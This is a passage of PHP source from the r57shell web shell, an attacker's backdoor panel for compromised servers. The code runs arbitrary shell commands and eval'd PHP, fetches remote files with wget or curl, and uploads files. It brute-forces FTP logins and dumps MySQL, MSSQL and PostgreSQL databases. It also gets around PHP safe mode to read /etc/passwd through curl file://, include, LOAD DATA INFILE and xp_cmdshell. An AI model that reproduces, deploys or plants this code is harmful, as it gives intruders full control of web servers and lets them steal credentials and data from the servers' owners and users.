| 1698 | $_POST['cmd']="ps -aux | grep dpc"; | ||
| 1699 | } | ||
| 1700 | if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} | ||
| 1701 | if (!empty($HTTP_POST_FILES['userfile']['name'])) | ||
| 1702 | { | ||
| 1703 | if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } | ||
| 1704 | else { $nfn = $HTTP_POST_FILES['userfile']['name']; } | ||
| 1705 | @copy($HTTP_POST_FILES['userfile']['tmp_name'], | ||
| 1706 | $_POST['dir']."/".$nfn) | ||
| 1707 | or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); | ||
| 1708 | } | ||
| 1709 | if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) | ||
| 1710 | { | ||
| 1711 | switch($_POST['with']) | ||
| 1712 | { | ||
| 1713 | case wget: | ||
| 1714 | $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; | ||
| 1715 | break; | ||
| 1716 | case fetch: | ||
| 1717 | $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; | ||
| 1718 | break; | ||
| 1719 | case lynx: | ||
| 1720 | $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; | ||
| 1721 | break; | ||
| 1722 | case links: | ||
| 1723 | $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; | ||
| 1724 | break; | ||
| 1725 | case GET: | ||
| 1726 | $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; | ||
| 1727 | break; | ||
| 1728 | case curl: | ||
| 1729 | $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; | ||
| 1730 | break; | ||
| 1731 | } | ||
| 1732 | } | ||
| 1733 | if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) | ||
| 1734 | { | ||
| 1735 | list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); | ||
| 1736 | if(empty($ftp_port)) { $ftp_port = 21; } | ||
| 1737 | $connection = @ftp_connect ($ftp_server,$ftp_port,10); | ||
| 1738 | if(!$connection) { fe($language,0); } | ||
| 1739 | else | ||
| 1740 | { | ||
| 1741 | if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } | ||
| 1742 | else | ||
| 1743 | { | ||
| 1744 | if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } | ||
| 1745 | if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } | ||
| 1746 | } | ||
| 1747 | } | ||
| 1748 | @ftp_close($connection); | ||
| 1749 | $_POST['cmd'] = ""; | ||
| 1750 | } | ||
| 1751 | if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") | ||
| 1752 | { | ||
| 1753 | list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); | ||
| 1754 | if(empty($ftp_port)) { $ftp_port = 21; } | ||
| 1755 | $connection = @ftp_connect ($ftp_server,$ftp_port,10); | ||
| 1756 | if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } | ||
| 1757 | else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } | ||
| 1758 | @ftp_close($connection); | ||
| 1759 | } | ||
| 1760 | echo $table_up3; | ||
| 1761 | if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } | ||
| 1762 | else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } | ||
| 1763 | echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; | ||
| 1764 | if($safe_mode) | ||
| 1765 | { | ||
| 1766 | switch($_POST['cmd']) | ||
| 1767 | { | ||
| 1768 | case 'safe_dir': | ||
| 1769 | $d=@dir($dir); | ||
| 1770 | if ($d) | ||
| 1771 | { | ||
| 1772 | while (false!==($file=$d->read())) | ||
| 1773 | { | ||
| 1774 | if ($file=="." || $file=="..") continue; | ||
| 1775 | @clearstatcache(); | ||
| 1776 | list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); | ||
| 1777 | if($windows){ | ||
| 1778 | echo date("d.m.Y H:i",$mtime); | ||
| 1779 | if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); | ||
| 1780 | } | ||
| 1781 | else{ | ||
| 1782 | $owner = @posix_getpwuid($uid); | ||
| 1783 | $grgid = @posix_getgrgid($gid); | ||
| 1784 | echo $inode." "; | ||
| 1785 | echo perms(@fileperms($file)); | ||
| 1786 | printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); | ||
| 1787 | echo date("d.m.Y H:i ",$mtime); | ||
| 1788 | } | ||
| 1789 | echo "$file\n"; | ||
| 1790 | } | ||
| 1791 | $d->close(); | ||
| 1792 | } | ||
| 1793 | else echo $lang[$language._text29]; | ||
| 1794 | break; | ||
| 1795 | case 'safe_file': | ||
| 1796 | if(@is_file($_POST['file'])) | ||
| 1797 | { | ||
| 1798 | $file = @file($_POST['file']); | ||
| 1799 | if($file) | ||
| 1800 | { | ||
| 1801 | $c = @sizeof($file); | ||
| 1802 | for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } | ||
| 1803 | } | ||
| 1804 | else echo $lang[$language._text29]; | ||
| 1805 | } | ||
| 1806 | else echo $lang[$language._text31]; | ||
| 1807 | break; | ||
| 1808 | case 'test1': | ||
| 1809 | $ci = @curl_init("file://".$_POST['test1_file'].""); | ||
| 1810 | $cf = @curl_exec($ci); | ||
| 1811 | echo $cf; | ||
| 1812 | break; | ||
| 1813 | case 'test2': | ||
| 1814 | @include($_POST['test2_file']); | ||
| 1815 | break; | ||
| 1816 | case 'test3': | ||
| 1817 | if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } | ||
| 1818 | $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); | ||
| 1819 | if($db) | ||
| 1820 | { | ||
| 1821 | if(@mysql_select_db($_POST['test3_md'],$db)) | ||
| 1822 | { | ||
| 1823 | $sql = "DROP TABLE IF EXISTS temp_r57_table;"; | ||
| 1824 | @mysql_query($sql); | ||
| 1825 | $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; | ||
| 1826 | @mysql_query($sql); | ||
| 1827 | $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; | ||
| 1828 | @mysql_query($sql); | ||
| 1829 | $sql = "SELECT * FROM temp_r57_table;"; | ||
| 1830 | $r = @mysql_query($sql); | ||
| 1831 | while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } | ||
| 1832 | $sql = "DROP TABLE IF EXISTS temp_r57_table;"; | ||
| 1833 | @mysql_query($sql); | ||
| 1834 | } | ||
| 1835 | else echo "[-] ERROR! Can't select database"; | ||
| 1836 | @mysql_close($db); | ||
| 1837 | } | ||
| 1838 | else echo "[-] ERROR! Can't connect to mysql server"; | ||
| 1839 | break; | ||
| 1840 | case 'test4': | ||
| 1841 | if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } | ||
| 1842 | $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); | ||
| 1843 | if($db) | ||
| 1844 | { | ||
| 1845 | if(@mssql_select_db($_POST['test4_md'],$db)) | ||
| 1846 | { | ||
| 1847 | @mssql_query("drop table r57_temp_table",$db); | ||
| 1848 | @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); | ||
| 1849 | @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); | ||
| 1850 | $res = mssql_query("select * from r57_temp_table",$db); | ||
| 1851 | while(($row=@mssql_fetch_row($res))) | ||
| 1852 | { | ||
| 1853 | echo $row[0]."\r\n"; | ||
| 1854 | } | ||
| 1855 | @mssql_query("drop table r57_temp_table",$db); | ||
| 1856 | } | ||
| 1857 | else echo "[-] ERROR! Can't select database"; | ||
| 1858 | @mssql_close($db); | ||
| 1859 | } | ||
| 1860 | else echo "[-] ERROR! Can't connect to MSSQL server"; | ||
| 1861 | break; | ||
| 1862 | } | ||
| 1863 | } | ||
| 1864 | else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ | ||
| 1865 | $cmd_rep = ex($_POST['cmd']); | ||
| 1866 | if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } | ||
| 1867 | else { echo @htmlspecialchars($cmd_rep)."\n"; }} | ||
| 1868 | if ($_POST['cmd']=="ftp_brute") | ||
| 1869 | { | ||
| 1870 | $suc = 0; | ||
| 1871 | foreach($users as $user) | ||
| 1872 | { | ||
| 1873 | $connection = @ftp_connect($ftp_server,$ftp_port,10); | ||
| 1874 | if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } | ||
| 1875 | else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } | ||
| 1876 | @ftp_close($connection); | ||
| 1877 | } | ||
| 1878 | echo "\r\n-------------------------------------\r\n"; | ||
| 1879 | $count = count($users); | ||
| 1880 | if(isset($_POST['reverse'])) { $count *= 2; } | ||
| 1881 | echo $lang[$language.'_text97'].$count."\r\n"; | ||
| 1882 | echo $lang[$language.'_text98'].$suc."\r\n"; | ||
| 1883 | } | ||
| 1884 | if ($_POST['cmd']=="php_eval"){ | ||
| 1885 | $eval = @str_replace("<?","",$_POST['php_eval']); | ||
| 1886 | $eval = @str_replace("?>","",$eval); | ||
| 1887 | @eval($eval);} | ||
| 1888 | if ($_POST['cmd']=="db_show") | ||
| 1889 | { | ||
| 1890 | switch($_POST['db']) | ||
| 1891 | { | ||
| 1892 | case 'MySQL': | ||
| 1893 | if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } | ||
| 1894 | $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); | ||
| 1895 | if($db) | ||
| 1896 | { | ||
| 1897 | $res=@mysql_query("SHOW DATABASES", $db); | ||
| 1898 | while(($row=@mysql_fetch_row($res))) | ||
| 1899 | { | ||
| 1900 | echo "[+] ".$row[0]."\r\n"; | ||
| 1901 | if(isset($_POST['st'])){ | ||
| 1902 | $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db); | ||
| 1903 | while(($row2=@mysql_fetch_row($res2))) | ||
| 1904 | { | ||
| 1905 | echo " | - ".$row2[0]."\r\n"; | ||
| 1906 | if(isset($_POST['sc'])) | ||
| 1907 | { | ||
| 1908 | $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db); | ||
| 1909 | while(($row3=@mysql_fetch_row($res3))) { echo " | - ".$row3[0]."\r\n"; } | ||
| 1910 | } | ||
| 1911 | } | ||
| 1912 | } | ||
| 1913 | } | ||
| 1914 | @mysql_close($db); | ||
| 1915 | } | ||
| 1916 | else echo "[-] ERROR! Can't connect to MySQL server"; | ||
| 1917 | break; | ||
| 1918 | case 'MSSQL': | ||
| 1919 | if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } | ||
| 1920 | $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); | ||
| 1921 | if($db) | ||
| 1922 | { | ||
| 1923 | $res=@mssql_query("sp_databases", $db); | ||
| 1924 | while(($row=@mssql_fetch_row($res))) | ||
| 1925 | { | ||
| 1926 | echo "[+] ".$row[0]."\r\n"; | ||
| 1927 | if(isset($_POST['st'])){ | ||
| 1928 | @mssql_select_db($row[0]); | ||
| 1929 | $res2 = @mssql_query("sp_tables",$db); | ||
| 1930 | while(($row2=@mssql_fetch_array($res2))) | ||
| 1931 | { | ||
| 1932 | if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties') | ||
| 1933 | { | ||
| 1934 | echo " | - ".$row2['TABLE_NAME']."\r\n"; | ||
| 1935 | if(isset($_POST['sc'])) | ||
| 1936 | { | ||
| 1937 | $res3 = @mssql_query("sp_columns ".$row2[2],$db); | ||
| 1938 | while(($row3=@mssql_fetch_array($res3))) { echo " | - ".$row3['COLUMN_NAME']."\r\n"; } | ||
| 1939 | } | ||
| 1940 | } | ||
| 1941 | } | ||
| 1942 | } | ||
| 1943 | } | ||
| 1944 | @mssql_close($db); | ||
| 1945 | } | ||
| 1946 | else echo "[-] ERROR! Can't connect to MSSQL server"; | ||
| 1947 | break; | ||
| 1948 | case 'PostgreSQL': | ||
| 1949 | if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } | ||
| 1950 | $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; | ||
| 1951 | $db = @pg_connect($str); | ||
| 1952 | if($db) | ||
| 1953 | { | ||
| 1954 | $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'"); | ||
| 1955 | while(($row=@pg_fetch_row($res))) | ||
| 1956 | { | ||
| 1957 | echo "[+] ".$row[0]."\r\n"; | ||
| 1958 | } | ||
| 1959 | @pg_close($db); | ||
| 1960 | } | ||
| 1961 | else echo "[-] ERROR! Can't connect to PostgreSQL server"; | ||
| 1962 | break; | ||
| 1963 | } | ||
| 1964 | } | ||
| 1965 | if ($_POST['cmd']=="mysql_dump") | ||
| 1966 | { | ||
| 1967 | if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } | ||
| 1968 | if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ | ||
| 1969 | $sqh = "# homepage: http://rst.void.ru\r\n"; | ||
| 1970 | $sqh .= "# ---------------------------------\r\n"; | ||
| 1971 | $sqh .= "# date : ".date ("j F Y g:i")."\r\n"; | ||
| 1972 | $sqh .= "# database : ".$_POST['mysql_db']."\r\n"; | ||
| 1973 | $sqh .= "# table : ".$_POST['mysql_tbl']."\r\n"; | ||
| 1974 | $sqh .= "# ---------------------------------\r\n\r\n"; | ||
| 1975 | switch($_POST['db']){ | ||
| 1976 | case 'MySQL': | ||
| 1977 | if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } | ||
| 1978 | $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); | ||
| 1979 | if($db) | ||
| 1980 | { | ||
| 1981 | if(@mysql_select_db($_POST['mysql_db'],$db)) | ||
| 1982 | { | ||
| 1983 | $sql1 = "# MySQL dump created by r57shell\r\n"; | ||
| 1984 | $sql1 .= $sqh; | ||
| 1985 | $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); | ||
| 1986 | $row = @mysql_fetch_row($res); | ||
| 1987 | $sql1 .= $row[1]."\r\n\r\n"; | ||
| 1988 | $sql1 .= "# ---------------------------------\r\n\r\n"; | ||
| 1989 | $sql2 = ''; | ||
| 1990 | $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); | ||
| 1991 | if (@mysql_num_rows($res) > 0) { | ||
| 1992 | while (($row = @mysql_fetch_assoc($res))) { | ||
| 1993 | $keys = @implode("`, `", @array_keys($row)); | ||
| 1994 | $values = @array_values($row); | ||
| 1995 | foreach($values as $k=>$v) {$values[$k] = addslashes($v);} | ||
| 1996 | $values = @implode("', '", $values); | ||
| 1997 | $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n"; | ||
| 1998 | } | ||
| 1999 | $sql2 .= "\r\n# ---------------------------------"; | ||
| 2000 | } | ||
| 2001 | if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } | ||
| 2002 | else { echo $sql1.$sql2; } | ||
| 2003 | } | ||
| 2004 | else echo "[-] ERROR! Can't select database"; | ||
| 2005 | @mysql_close($db); | ||
| 2006 | } | ||
| 2007 | else echo "[-] ERROR! Can't connect to MySQL server"; | ||
| 2008 | break; | ||
| 2009 | case 'MSSQL': | ||
| 2010 | if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } | ||
| 2011 | $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); | ||
| 2012 | if($db) | ||
| 2013 | { | ||
| 2014 | if(@mssql_select_db($_POST['mysql_db'],$db)) | ||
| 2015 | { | ||
| 2016 | $sql1 = "# MSSQL dump created by r57shell\r\n"; | ||
| 2017 | $sql1 .= $sqh; | ||
| 2018 | $sql2 = ''; | ||
| 2019 | $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db); | ||
| 2020 | if (@mssql_num_rows($res) > 0) { | ||
| 2021 | while (($row = @mssql_fetch_assoc($res))) { | ||
| 2022 | $keys = @implode(", ", @array_keys($row)); | ||
| 2023 | $values = @array_values($row); | ||
| 2024 | foreach($values as $k=>$v) {$values[$k] = addslashes($v);} | ||
| 2025 | $values = @implode("', '", $values); | ||
| 2026 | $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; | ||
| 2027 | } | ||
| 2028 | $sql2 .= "\r\n# ---------------------------------"; | ||
| 2029 | } | ||
| 2030 | if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } | ||
| 2031 | else { echo $sql1.$sql2; } | ||
| 2032 | } | ||
| 2033 | else echo "[-] ERROR! Can't select database"; | ||
| 2034 | @mssql_close($db); | ||
| 2035 | } | ||
| 2036 | else echo "[-] ERROR! Can't connect to MSSQL server"; | ||
| 2037 | break; | ||
| 2038 | case 'PostgreSQL': | ||
| 2039 | if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } | ||
| 2040 | $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; | ||
| 2041 | $db = @pg_connect($str); | ||
| 2042 | if($db) | ||
| 2043 | { | ||
| 2044 | $sql1 = "# PostgreSQL dump created by r57shell\r\n"; | ||
| 2045 | $sql1 .= $sqh; | ||
| 2046 | $sql2 = ''; | ||
| 2047 | $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl'].""); | ||
| 2048 | if (@pg_num_rows($res) > 0) { | ||
| 2049 | while (($row = @pg_fetch_assoc($res))) { | ||
| 2050 | $keys = @implode(", ", @array_keys($row)); | ||
| 2051 | $values = @array_values($row); | ||
| 2052 | foreach($values as $k=>$v) {$values[$k] = addslashes($v);} | ||
| 2053 | $values = @implode("', '", $values); | ||
| 2054 | $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; | ||
| 2055 | } | ||
| 2056 | $sql2 .= "\r\n# ---------------------------------"; | ||
| 2057 | } | ||
| 2058 | if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } | ||
| 2059 | else { echo $sql1.$sql2; } | ||
| 2060 | @pg_close($db); | ||
| 2061 | } | ||
| 2062 | else echo "[-] ERROR! Can't connect to PostgreSQL server"; | ||
| 2063 | break; | ||
| 2064 | } | ||
| 2065 | } | ||
| 2066 | else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; } | ||
| 2067 | } | ||
| 2068 | echo "</textarea></div>"; | ||
| 2069 | echo "</b>"; | ||
| 2070 | echo "</td></tr></table>"; | ||
| 2071 | echo "<table width=100% cellpadding=0 cellspacing=0>"; | ||
| 2072 | function up_down($id) | ||
| 2073 | { | ||
| 2074 | global $lang; | ||
| 2075 | global $language; | ||
| 2076 | return ' <img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">'; | ||
| 2077 | } | ||
| 2078 | function div($id) | ||
| 2079 | { | ||
| 2080 | if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; | ||
| 2081 | return '<div id="'.$id.'">'; | ||
| 2082 | } | ||
| 2083 | if(!$safe_mode){ | ||
| 2084 | echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts; | ||
| 2085 | echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); | ||
| 2086 | echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); | ||
| 2087 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2088 | } | ||
| 2089 | else{ | ||
| 2090 | echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts; | ||
| 2091 | echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); | ||
| 2092 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2093 | } | ||
| 2094 | echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts; | ||
| 2095 | echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); | ||
| 2096 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2097 | if($safe_mode){ | ||
| 2098 | echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts; | ||
| 2099 | echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); | ||
| 2100 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2101 | } | ||
| 2102 | if($safe_mode && $unix){ | ||
| 2103 | echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts; | ||
| 2104 | echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); | ||
| 2105 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2106 | } | ||
| 2107 | if(!$safe_mode){ | ||
| 2108 | foreach ($aliases as $alias_name=>$alias_cmd) | ||
| 2109 | { | ||
| 2110 | $aliases2 .= "<option>$alias_name</option>"; | ||
| 2111 | } | ||
| 2112 | echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts; | ||
| 2113 | echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); | ||
| 2114 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2115 | } | ||
| 2116 | echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts; | ||
| 2117 | echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); | ||
| 2118 | echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); | ||
| 2119 | echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); | ||
| 2120 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2121 | if(!$safe_mode && $unix){ | ||
| 2122 | echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts; | ||
| 2123 | echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); | ||
| 2124 | echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); | ||
| 2125 | echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); | ||
| 2126 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2127 | } | ||
| 2128 | echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font; | ||
| 2129 | echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; | ||
| 2130 | echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); | ||
| 2131 | echo "</textarea>"; | ||
| 2132 | echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); | ||
| 2133 | echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); | ||
| 2134 | echo "</div></div></font>"; | ||
| 2135 | echo $table_end1.$fe; | ||
| 2136 | if($safe_mode&&$curl_on) | ||
| 2137 | { | ||
| 2138 | echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts; | ||
| 2139 | echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); | ||
| 2140 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2141 | } | ||
| 2142 | if($safe_mode) | ||
| 2143 | { | ||
| 2144 | echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts; | ||
| 2145 | echo "<table class=table1 width=100% align=center>"; | ||
| 2146 | echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); | ||
| 2147 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2148 | } | ||
| 2149 | if($safe_mode&&$mysql_on) | ||
| 2150 | { | ||
| 2151 | echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts; | ||
| 2152 | echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); | ||
